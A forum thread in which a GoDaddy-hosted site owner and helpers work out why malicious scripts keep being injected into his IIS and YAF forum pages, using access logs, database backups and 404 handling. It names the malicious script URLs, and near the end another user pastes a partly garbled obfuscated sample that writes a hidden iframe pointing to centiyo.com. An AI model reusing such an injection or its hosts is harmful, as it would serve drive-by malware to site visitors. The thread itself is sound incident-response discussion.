I’ve got a godaddy shared windows hosting. Site name http://www.havenlarp.com
Back in October I started getting scripts added to my webpages and parts of my forum (*.aspx files on the forum usually though sometimes a few others).
I thought maybe it was because I was using an older version of the forum. I was using YAF 1.9.1.7. I upgraded it to 1.9.3 which is the latest final release (1.9.4 is still in beta). As far as I know, YAF has no security issues that would allow a hacker access to anything other than the database. When I did the upgrade, 1.9.3 couldn’t even edit it’s own txt file with some site settings, I had to manually set up the site that way and upload the txt so the online install could link to the database. However, this didn’t solve the problem.
After that I thought maybe my password had been compromised. So I changed it. No luck. So I changed user name and password. No luck.
Then I thought, maybe I’m infected with a keylogger and that’s what’s killing me. So I switched over to a linux machine I have, logged in to GoDaddy from there to change the user name and password and do website maintanence from there to see if that solved it. No luck.
So I pared my website down to just an index file that had nothing but text and 1 image. Even still, that was compromised by a script.
However, there’s 1 folder I can’t get rid of on GoDaddy. GoDaddy creates a statistics folder that is accessible from outside their login. So it can be accessed via /stats/. I tried deleting that folder in GoDaddy’s ftp program, it won’t delete. Al files contained therein are removed except a folder inside it called /logs/. If I check the GoDaddy filemanager, I can’t see the file so I can’t check or modify its access rights. If I turn statistics monitoring off, the folder remains and still cannot be deleted. The folder is password protected if you attempt to access it from outside godaddy’s hosting management system via http://www.havenlarp.com/stats/ . Is that the culprit?
I’m still running IIS6 because I’d heard 7 conflicts somewhat with YAF on some setups. Could IIS6 be to blame?
GoDaddy is somewhat less than helpful so part of me would like to move hosts, but I don’t pay the bill on it so all I can do is recommend movement. To make matters worse on that front, in September, a long term subscription was renewed. I doubt getting out of that would be easy.
Should I go to IIS7? Is GoDaddy just really dirty and its coming from inside?
What was the nature of the malicious script?
Do you have a GoDaddy plan that gives you access logs?
Does Google Webmaster Tools: http://www.google.com/webmasters/ give you any additional info about the affected pages? The Safe Browsing report only says there are two.
I’ve examined a number of files from the main site and the forum and haven’t found anything malicious. UnmaskParasites finds nothing. Dasient finds nothing.
I tried accessing the /stats/ folder, but was rejected as Unauthorized. That’s what would happen to Google, too, even if there were something malicious in there. I tried a nonexistent page. No problem in the error page.
Do browse your database data if you have a means to do so.
Your efforts have covered a lot of bases.
If you can find other sites on your server, check them to see if they are flagged. Try http://tomdns.net/get_hostonip.php.
There have been about 6 or 7 different malicious scripts. Generally they’ve been calling PHP files on other sites.
One of them was a script calling
http://armeria.org/matrikel-filer/buttonbas.php?s=sxXN2gQ&id=2
Another was classified as Malware name: HTML:Script-inf from an avast report.
But there’s been 4 or 5 other scripts inserted. They are however, consistently inserted between the head tags and the body tags.
What’s interesting about the information that Google Webmaster Tools gave me is it listed less files as having malicious scripts than I could find by just reading the source codes and seeing that scripts had been added. However, it didn’t really give me anything useful.
Godaddy does theoretically give me access logs. Attempting to access them though crashed my browser on three different systems. When I told them that they told me I didn’t know how to open them. So I played along, followed their instructions to a T and crashed my browser again. They remain convinced that I can’t follow instructions. They’re less than helpful people.
You’re not currently finding anything on it because I uploaded my entire site a few hours ago from locally saved files to clear the scripts off again. I’ve basically been uploading my whole site every day or so which is probably why it took google 3 months to classify the site as an attack site. That probably makes it hard to narrow down what’s coming in, but I can clean the site off easily enough, my problem is preventing reinfection. It just keeps coming back.
As for /stats/ I was concerned that it could be used to insert code if garbage was input to it. Possible or not with that one?
I can view my database. What am I looking for in there? I’ve already tried searching for a few of the scripts in there and haven’t turned up a thing there ever.
I checked bout 20 sites that came up on tomdns and none of them were flagged (granted there were over 800 listed) and none appeared to have script insertions similar to what happens on my site.
Should I be concerned over still having IIS6?
What’s interesting about the information that Google Webmaster Tools gave me is it listed less files as having malicious scripts than I could find by just reading the source codes and seeing that scripts had been added. However, it didn’t really give me anything useful.
There are two areas of the Dashboard of Google Webmaster Tools that may provide helpful information related to malware. One area is [Labs|Malware Details] and the other is from the red malware warning bar with the [More Details] link. Be certain to check both areas and to understand the limitations of each. Google does not necessarily scan every single page of a site.
If you do not have any information in the [Malware Details] area of [Labs], please add comments to the following blog so that Google can become more aware of the limitations of this new feature.
Show me the Malware! –
http://googleonlinesecurity.blogspot.com/2009/10/show-me-malware.html
The Malware Warning Review Process
http://googleonlinesecurity.blogspot.com/2009/10/malware-warning-review-process.html
Upon receiving a Malware Review request, an automated set of algorithms verifies that the site has been cleaned. These algorithms revisit a subset of both the malicious and non-malicious pages that were scanned when the site was originally flagged. Additionally, these algorithms test some pages that were not originally scanned.
I can’t even find this Labs area in tools. All I’m seeing is messages.
As for review, I’ve already requested and received review. I passed.
I passed mostly because I just keep uploading the site over and over again to get the malware off.
I’m more concerned with preventing reinfection since I can’t figure out how it got in in the first place.
Are the GoDaddy logs just files that you download from a link? If you get a choice to Open or Save, choose Save. Also try a different browser. On a Windows server, I imagine the log file would be in .zip format rather than the .gz used on Linux. If the logs have been accumulating for a long time, they might be very big even if zipped, which might pose a problem on dialup (which is what I have).
If the log file is stored in your site files, you might also be able to download the file directly from the control panel’s File Manager. As I recall, GoDaddy’s control panel (for Linux servers, anyway) is somewhat sparse, but I think there is some sort of File Manager for navigating your site files.
Yes, if somebody got write access to the server (which apparently they have), a malicious script could probably write a file into /stats/ that could be used in a malicious way, but probably only by a script already running inside the server. You might be able to see what is in /stats/ using File Manager. Depending on the permissions, access might be problematic. If GoDaddy put the folder there, it will be set so you can’t easily mess it up.
See if control panel provides a means to browse or backup your db tables. Linux servers often have a tool called phpMyAdmin. You’d be looking for a Windows server equivalent, or ANY means to browse the tables, or dump them to a text file, or backup the db to a file for you to download for examination in MS Access, for example. Otherwise, you might have to write some ASP code to dump the tables to files for you to review. Or maybe use your server’s db connection strings to connect to it remotely using MS Access on your computer. Basically, there are several ways, but none of them very simple.
A web search on “matrikel-filer” turned up another site hit hard by this that also uses .asp.
I’ve hesitated to mention this because what I happen to notice doesn’t necessarily mean there is a trend, but a disproportionate number of the hacked sites I’ve seen the past 3-4 months have been using IIS6, although what I’ve noticed has been more the “IIS” than the “6”.
But it’s also possible somebody’s found a new security hole in YAF.
Ok, I see you already have a way to search the database. I’d look for any JavaScript or VBScript code at all. Also anything that isn’t plain text or variable values. Technically, you’re looking for whatever code is being injected, but it might not be in a form that is easy to spot.
The site appears to have some unused content, or duplication, or “something”; for example, there is a /forum/ directory and also /forums/. Anything that is not in active use should be deleted. A vulnerable file remains vulnerable as long as it’s there, even if you’ve removed all hyperlinks that point to it.
Don’t give up on getting the logs. Since they hold the possibility of finding out how the site is being attacked over and over, and the database doesn’t, the logs are more important.
I’m not sure where you’re seeing /forum/ and /forums/. I’m looking at GoDaddy’s Java FTP client (Which is the only way I can see /stats/ and /logs/ as neither show up in the GoDaddy File Manager). I see only /forum/. I’m shouldn’t have any duplication. I burned the site down to just an index file and /stats/ not to long ago to try and figure out were vulnerabilities were. I was reinfected at that point and so uploaded only what was necessary after that with no duplications at that time.
I’ve got the logs now. It’s pretty complicated. I’m not really sure what I’m looking at though. A lot of it seems to do with the forum. Which is expected I suppose. 98% of it seems to be a get, until there’s a post on /Forum/default.aspx every so oftne. I don’t know it that’s a login to the forum or if it’s just listing actions taken from the control panel or if there shold be zero Posts.
A lot of them start by trying to get robots.txt which doesn’t exist.
What I’ve also just noticed is that there’s a php call in the forum again.
http://iwvision.com/images/nt1/title-portfolio.php
iwvision.com is listed by google as an attack site.
Several forum files have been edited today at approximated 6:30 am Eastern according to their last modified dates on GoDaddy. I uploaded fresh copies of those yesterday, not today. Appears to be 3 aspx files in /forum/: advanced.aspx, default.aspx, and error.aspx.
Unforunatly I can’t view the logs for the 29th (today) until tomorrow.
I use a download tool that is configured to follow links and recreate your server’s directory structure here as the files are downloaded. It created both a /forum/ folder and also /forums/.
There is some very weird activity going on.
When I request /forums/ in Firefox, it produces what appears to be an endless chain of recursive calls to your files (not to an external site, as far as I can tell) that creates a huge amount of back and forth traffic between me and your server, which hangs up Firefox, disrupts my screen display, and forces me to manually close Firefox.
The same thing happens when I request /foruma/, so this behavior seems to occur when a nonexistent folder is requested out of the forum.
If I request a nonexistent file from your site like nopage.html, I get a 200 Success result code (which is however incorrect) and it redirects to your home page. So “Not Found” errors are being handled differently by your main site and by your forum. The main site handling is technically wrong and should be fixed to return no page at all and a “404” result code. But the forum’s handling of 404’s is so bad that Google would indeed consider it malicious even if it is only inadvertent.
Take a close look at how your site (probably in your .asp code?) handles 404 – Not Found errors, and especially how YAF code is handling the same.
This seems to be a separate issue from the script insertions, at least from what I’ve seen so far.
On your forum pages, there is a reference to a script from iwvision.com inserted before the body tag of each page. The script is called automatically when the page is loaded. Since they’re a flagged site, and your site loads this script automatically, if their site is flagged and has malware, you’ll get flagged, too.
Here’s the surrounding code, somewhat altered:
As expected, the forum editor tore it to pieces, so I removed it. Anyway, you can View Source on any forum page. Here’s the offending line:
script src=hxxp :// iw vision . com / images / nt1 / title-portfolio . php
Yep. I saw that (See my previous post) I was leaving it there briefly so I wouldn’t have any good data in the access logs now that I was able to get at them. I also wanted you to see what I was getting since last time you didn’t see it since I’d cleaned things out. Several ASPX files have modified dates of early on the morning of the 29th.
Any more thoughts on prevention? I’m not 100% sure what I’m looking for in the logs since it’s 99% Gets and then an occasional put on default.aspx in the forum which i’m assuming is a post or a login, but I can’t be certain.
What I’m noticing that is bizarre about the logs is the timestamps on them.
Jun2009 Logs: November 29
July2009 Logs: August 1
Aug2009 logs: August 31
Sept2009 Logs: September 30
Oct2009 logs:October 31
November2009 Logs: November 29
Why is the June Log dated November 29th? Peculiar I think.
There are no posts close to 6:30, only gets.
As for the /forums/ issue I don’t think it has anything to do with the forums. go to /random/ or /anything/. As far as the forum is concerned, only /forum/ exists. I set it so that it believes /forum/ is root. /random/ would have nothing to do with the forum. However, I managed to load /random/ and then view its source. It appears that what it’s doing is redirecting any blank page to ~/index.html but since index.html is calling relative pages in frames, it results in calling more index.html. I might be able to fix that by having /index.html call absolute links or by making /index just a splash page and then go to the main page via a link. I have no clue why it does that, but I’m pretty sure its unrelated to the forums.
As for my database, I can back it up and download the backup to go through it that way. Is there a program I could easily read it in? Or will I have to run SQL on my desktop? When I open it in gedit or notepad, it’s broken up with spaces between each character and is difficult to read. Alternatively I could read it on the server but that’s a slow process. If that’s how it has to be though, it’s doable.
Finally a bit more on IIS, according to GoDaddy, for security reasons they don’t allow IIS manager on IIS7, but they do on IIS6. But I recall seeing somewhere that that was allowed on accounts using IIS6. I don’t really know what that’s talking about specifically, but I am drawn to wonder if that’s a potential hole in this case, especially since you said you’d seen a good number of attacks against IIS6 users and IIS in general.
“Several ASPX files have modified dates of early on the morning of the 29th.”
“Why is the June Log dated November 29th? Peculiar I think.”
Yes, both of those do not seem normal.
“an occasional put on default.aspx in the forum which i’m assuming is a post or a login”
A forum login would most likely be a POST (not a forum post, but an HTTP “POST”, in the same sense that a GET is an HTTP GET). An HTTP PUT is worrisome because it is an instruction to the server to take the provided file and PUT it on the server. The server should NEVER allow that. In those entries there should be a number of “403” in the line, meaning Forbidden (the server did not honor the request). If it is instead a result code of 200, that could be bad. If the file has a timestamp that is the same as the PUT request, that means the server seems to be allowing something it absolutely should not, and it will require reconfiguration, probably by the host unless this is somehow handled in your ASP code. I would think that accepting a PUT would be a highly unusual and near impossible misconfiguration, but the fact that you stripped the site down to 1 html file, changed passwords, logged in from a linux PC, and it still got injected, makes weird scenarios seem more plausible.
This describes the possible result codes: http://en.wikipedia.org/wiki/List_of_HTTP_status_codes
For interpreting the logs, this link looks helpful, but I simply got it from a web search on
IIS log explain
so you might be able to find others
http://www.microsoft.com/windows/windows2000/en/advanced/iis/htm/core/iiabtlg.htm
“As for my database, I can back it up and download the backup to go through it that way. Is there a program I could easily read it in? Or will I have to run SQL on my desktop? When I open it in gedit or notepad, it’s broken up with spaces between each character and is difficult to read. Alternatively I could read it on the server but that’s a slow process. If that’s how it has to be though, it’s doable.”
The spaces between chars might be due to Unicode 16-bit text encoding with the in-between spaces actually being null bytes 00. It might be possible to either specify which encoding your editor should use, or maybe convert it by using SaveAs… Could be worth a try in Notepad, WordPad, gedit, or BlueFish. Does the file have an “.sql” extension?
My mistake. It wasn’t a PUT, it was a POST. I don’t know what possessed me to type PUT.
The file has a .bak extension.
I opened it up in Open Office Writer using Unicode encryption. I can read parts of it bt other parts are just garbage. Mostly #s that are breaking up sections. So I’ll get a post and then a bunch of # and other garbage before another post or I’ll get what I think is user data, broken up by the same.
It also seems that only parts of the bak file are encrpyted. When I view it with unicode encryption I can read posts etc with the issue I mentioned before but parts of the file become unreadable. Those parts are viewable as plain text. The parts that I can view in plain text appear to be the actual guts of the database.
Broken in among that though are parts that appear to be unicode and have somewhat strange things in them. I can pick out works lik “CALGARY” “VERIZON” “CAGE BY PET TREX” and also what appears to be addresses.
The parts that look like their the guts of the database also have some random pits of garbage broken in between sections. There’s be an “END” followed by garbage, followed by a “BEGIN”
Out of curiosity, did you ever figure out if GoDaddy is the culprit? I’m having the same problem with several of my GD hosting accounts. Avast keeps flagging these inserted scripts as an iFrame trojan. I’ve changed my passwords multiple times and reloaded fresh copies of the HTML pages, but after a certain amount of time, the script is re-inserted and Avast flags them again as the same malware type.
Sample of the script is below…
///copy of script///
function PyqrS document getElementById
document[’w129r189i200t102102e’replace(/[0-9]/g, div id=yAI style visibility:hidden;display :none">%3Ciframe width%3D 1 height%3D1 border%3D0 fra mebor der%3D 0 src%3D%27http%3A%2F%2Fcentiyo.com%2Fin.cgi%3Fdefault%27%3E%3C%2Fiframe%3E function FNQTZzGxY(gaAdNomZIG){ fff.op.replace(“1123”); }
docume t[‘w161r137i16 7t161 119e .repla ce(/ [ -9]/g,’‘)](u nesc ape(document.getElemen ById(’yAI’).innerHT ML));f un ction n xZ HTf nHpm(z GuRQsw){ var FcZJw = document.getElementById(‘ZEucwCdBIG’);v ar FcZJw = document.getElementById(‘ZEucwCdBIG’);var FcZJw = d ocu ment.ge tEle mentById(‘ZEucwCdBIG’);windo w.e val();
function SgAk WUU{ alert(‘PXU’);v ar ycKxO=new Functio n(“PN uwF”, “return 5856;” );var = docu ment .getEleme ntById(‘KwbvL’); fff.op.rep lace(" 1114" );
function algoxfTdS(CQdWGsxMf){ var IjuAtlIPWw=new Function(“EBFAAulbve”, “return 564742;”); fff= op. s plit(“199”)